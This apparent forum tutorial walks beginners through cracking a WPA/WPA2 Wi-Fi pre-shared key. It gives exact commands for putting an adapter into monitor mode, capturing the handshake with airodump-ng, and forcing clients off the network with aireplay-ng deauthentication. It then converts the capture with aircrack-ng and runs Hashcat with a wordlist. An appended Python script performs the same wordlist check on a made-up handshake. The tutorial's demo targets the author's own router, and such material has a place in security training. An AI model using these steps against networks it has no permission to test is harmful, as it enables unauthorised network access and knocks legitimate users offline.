Cracking WPA/2 with Hashcat in Windows | Tutorial for beginners

In this tutorial I will demonstrate how to use both Windows and Linux to recover a WPA/WPA2 pre-shared key: Linux, running in a virtual machine, captures the four-way handshake, and Windows runs Hashcat against that handshake on the GPU.


The reason I am using both Windows and Linux is that my Linux OS runs in a virtual machine, and the hypervisor does not give a virtual machine direct access to the host's graphics card. As a result, I will use my Windows host, which has an Nvidia GTX 465 graphics card, to do all the WPA/2 key cracking.



Another reason to use Linux is that wireless injection drivers work much better under Linux than under Windows. Injecting wireless frames under Windows is possible, but the hardware that supports it is very expensive and not many of us can afford it, so I highly recommend Linux for the capture part of this tutorial.

I understand that some of you have little or no experience with Linux. That's why I have made this tutorial as simple as possible; if you follow it carefully and put some effort in, you will succeed.


WARNING: Before you proceed with the steps below, you must ensure you have compatible hardware, or there is no guarantee that things will work for you.


1) Compatible adapters

  • Alfa AWUS036H
  • Alfa AWUS036NHA
If your adapter is known to support monitor mode and packet injection, you can use it; otherwise you will need to buy one of the adapters above.
Be aware that only USB adapters will work with VirtualBox, because a USB device can be passed through to the guest. A built-in or internal WIFI adapter will NOT WORK: the guest only sees VirtualBox's virtual network card, not your host's wireless chipset.



2) Compatible graphics cards


Step 1


Download VirtualBox from this URL:
https://www.virtualbox.org/wiki/Downloads


Step 2

Download Backtrack from this URL:
http://www.backtrack-linux.org/downloads/
Remember to download the BackTrack 5 R3, x64, KDE version.


Step 3

We need to set up our virtual machine so that we can install Backtrack on it.
The YouTube videos below walk you through creating the VM and installing Backtrack on it.

How to create a Virtual Machine?



How to install Backtrack 5 R3?



Step 4



Now we are going to download Hashcat and set up a working directory for it, along with wordlists.

Once you have downloaded the Hashcat files, create a folder in the root of your C:\ drive and call it Hashcat. Then unzip everything you just downloaded into it. It should look like the screenshot below.

[img]http://infiltrator.webs.com/images/Untitled.png[/img]



Step 5



Now we need to acquire our wordlists. The wordlists provided at the following URL are highly recommended.

Download whatever ones you can and save them into the Hashcat directory you created. The Hashcat command at the end of this tutorial uses rockyou.txt, so make sure that one is in the directory.

If you require more wordlists, feel free to PM me!




Step 6



Let's get started. I am going to set up a target AP called "HackMe" and, for the sake of this tutorial, give it a very simple pass-phrase so that we can crack it successfully.

The wireless access point I am using is a NetGear N150 wireless router, WNR100 v3.
You can use any other brand or model of wireless router you like.

Now head over to your virtual machine and fire up your Backtrack 5 OS.
Once it is up and running, plug your WIFI adapter into the host, attach it to the VM through VirtualBox's USB device menu, and verify that the guest can see it with the following command:
lsusb

Step 7


Provided there are no errors, we first list the wireless interfaces and then put the card into monitor mode, which creates a monitor-mode interface called "mon0". In your Backtrack 5 VM, open a terminal and type the following commands:
airmon-ng
Then
airmon-ng start wlan0
The first command shows your wireless interfaces and their drivers; the second creates mon0 on top of wlan0. If airmon-ng lists your adapter under a different name, use that name instead of wlan0.

Step 8

Now that our WIFI card is in monitor mode, we are going to use the Airodump-ng utility to see which wireless networks are in range.

In the terminal, type airodump-ng followed by the monitor interface. The monitor interface will be "mon0"; the name can vary depending on your adapter chipset.
airodump-ng mon0
Note the BSSID (MAC address) and channel of "HackMe" from the listing. Now let's instruct Airodump-ng to lock onto that channel, monitor only the "HackMe" AP and record all of its traffic to a .cap file, so that we capture the handshake needed to crack the WPA/2 key:
airodump-ng --channel <target's channel> --bssid <Target AP's MAC address> -w HackMe mon0
The -w prefix produces a file named HackMe-01.cap (airodump-ng appends -01, -02, ... to the prefix). Leave this running in its own terminal.
To capture the WPA handshake we can either wait for a client to connect to the target AP, or deauthenticate a client that is already connected so that it reconnects and performs the four-way handshake again.

To deauthenticate a client, we use the Aireplay-ng utility, which is part of the Aircrack-ng suite. In a second terminal, the command is as follows:
aireplay-ng -0 10 -a <MAC address of target AP> -c <MAC address of targeted client> mon0
-0 10 sends ten bursts of deauthentication frames to the client (its MAC address appears under STATION in the airodump-ng window). Both the AP and the client must be within range of your adapter, otherwise you will see the deauth frames go out but no handshake come back. When the handshake has been captured, airodump-ng shows "WPA handshake: <BSSID>" in its top-right corner.

Step 9


Once airodump-ng reports "WPA handshake: <BSSID>", we know we have a valid handshake. We now use the Aircrack-ng utility to convert the HackMe-01.cap file into a .hccap file.
By default, Hashcat only accepts its own .hccap file format. We can't feed it .pcap or .cap files, as those formats are not supported.



Converting the .cap file into .hccap is very simple. First, run ls to verify that our HackMe-01.cap exists.
[img]http://infiltrator.webs.com/images/aircrack-ng1.png[/img]

Now that we know HackMe-01.cap exists, we use the following command to convert it:
aircrack-ng HackMe-01.cap -J HackMe-01
Aircrack-ng appends the .hccap extension itself, so this writes HackMe-01.hccap (passing -J HackMe-01.hccap would leave you with HackMe-01.hccap.hccap). If the capture contains more than one network, aircrack-ng asks which one to convert; pick "HackMe". Aircrack-ng has now finished converting the .cap file. We now need to get the HackMe-01.hccap file onto our Windows machine so that we can crack the WPA key with Hashcat.

To transfer the .hccap file, I will be using Dropbox. I will show how the installation is done on the Linux side.
On the Windows side it should be a straightforward installation for a GUI guru like yourself. Save the file into the C:\Hashcat directory next to the wordlists.



Hashcat command (cudaHashcat is the Nvidia build; -m 2500 selects the WPA/WPA2 hash mode). Run it from a command prompt inside C:\Hashcat, where both the .hccap file and rockyou.txt were saved:
cudaHashcat-plus64.exe -m 2500 HackMe-01.hccap rockyou.txt
If the pass-phrase is in the wordlist, Hashcat prints the recovered pass-phrase at the end of the output line for that handshake; if the wordlist is exhausted without a hit, the pass-phrase simply is not in it and you need a better wordlist or a rule set.
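As an added worked example (not part of the original tutorial and not Hashcat's or Aircrack-ng's own code), here is what the last two steps amount to in code: the legacy hccap record that aircrack-ng -J writes, and the check that cudaHashcat -m 2500 repeats for every entry in rockyou.txt. It derives the PMK from the candidate pass-phrase with PBKDF2, the KCK from the 802.11i PRF, and compares the EAPOL MIC against the captured one. Every handshake value (MAC addresses, nonces, EAPOL frame) is constructed, the SSID "HackMe" is borrowed from the tutorial, the pass-phrase "hackme2012" is an assumption, and the 392-byte hccap field order is reproduced from memory of the old hashcat struct, so treat that layout as an assumption too; the code packs and unpacks it with the same layout, so the round trip is self-consistent either way.

```python
"""WPA/WPA2-PSK handshake check: the computation behind hashcat -m 2500.

Added example, not the tutorial's own code. All handshake values below
(MAC addresses, nonces, passphrase, EAPOL frame) are constructed. The
392-byte hccap field order is the legacy hashcat layout as remembered
here (an assumption); pack and unpack use the same layout, so the
round-trip is self-consistent either way.
"""
import hashlib
import hmac
import struct

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    Those 4096 rounds are paid for every wordlist candidate, which is why
    the tutorial hands this job to the GPU."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """KCK = first 16 bytes of PTK = PRF-512(PMK, "Pairwise key expansion",
    min(MACs) || max(MACs) || min(nonces) || max(nonces)). Only the first
    HMAC block of the PRF is needed to verify a MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    msg = b"Pairwise key expansion\x00" + data + b"\x00"  # counter byte 0
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16]


def eapol_mic(kck: bytes, eapol: bytes, keyver: int) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed.
    keyver 1 (WPA/TKIP) uses HMAC-MD5, keyver 2 (WPA2/CCMP) HMAC-SHA1,
    truncated to 16 bytes in both cases."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if keyver == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


# Legacy hccap record (assumed layout): essid, AP MAC, client MAC, SNonce,
# ANonce, EAPOL frame, EAPOL length, key descriptor version, captured MIC.
HCCAP = struct.Struct("<36s6s6s32s32s256sii16s")


def pack_hccap(ssid, ap_mac, sta_mac, anonce, snonce, eapol, keyver, mic):
    return HCCAP.pack(ssid.encode().ljust(36, b"\x00"), ap_mac, sta_mac,
                      snonce, anonce, eapol.ljust(256, b"\x00"),
                      len(eapol), keyver, mic)


def crack_hccap(blob: bytes, wordlist):
    """Return the first candidate whose KCK reproduces the captured MIC, else None."""
    essid, ap_mac, sta_mac, snonce, anonce, eapol, size, keyver, mic = HCCAP.unpack(blob)
    ssid = essid.rstrip(b"\x00").decode()
    eapol = eapol[:size]
    for candidate in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(candidate, ssid),
                           ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol, keyver), mic):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) of the WPA2 4-way
    handshake. key_info 0x010a = Pairwise | MIC | descriptor version 2."""
    body = struct.pack(">BHH8s32s16s8s8s16sH", 2, 0x010a, 0,
                       b"\x00" * 7 + b"\x01", snonce, b"\x00" * 16,
                       b"\x00" * 8, b"\x00" * 8, mic, 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body  # 802.1X-2004, EAPOL-Key


def sample_hccap() -> bytes:
    """Forge a capture of SSID "HackMe" protected by the constructed
    passphrase "hackme2012", as aircrack-ng -J would have written it."""
    ap_mac = bytes.fromhex("001e2a000001")   # constructed
    sta_mac = bytes.fromhex("00c0ca000002")  # constructed
    anonce = bytes(range(32))                # constructed
    snonce = bytes(range(100, 132))          # constructed
    kck = kck_from_pmk(pmk_from_passphrase("hackme2012", "HackMe"),
                       ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, build_msg2(snonce), keyver=2)
    return pack_hccap("HackMe", ap_mac, sta_mac, anonce, snonce,
                      build_msg2(snonce, mic), 2, mic)


if __name__ == "__main__":
    # A four-entry "wordlist" standing in for rockyou.txt.
    print("recovered PSK:", crack_hccap(sample_hccap(),
                                        ["letmein", "password123", "hackme2012", "qwerty"]))
```

Two details worth noticing: only the first HMAC of PRF-512 is computed, because the KCK is its first 16 bytes and nothing else from the PTK is needed to check a MIC; and the captured frame's MIC field is zeroed before verification, which is why the .hccap keeps the whole EAPOL frame and the MIC as separate fields. The PBKDF2 step is the expensive part, and it depends on the SSID, so rainbow tables only help against networks that reuse a common SSID.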


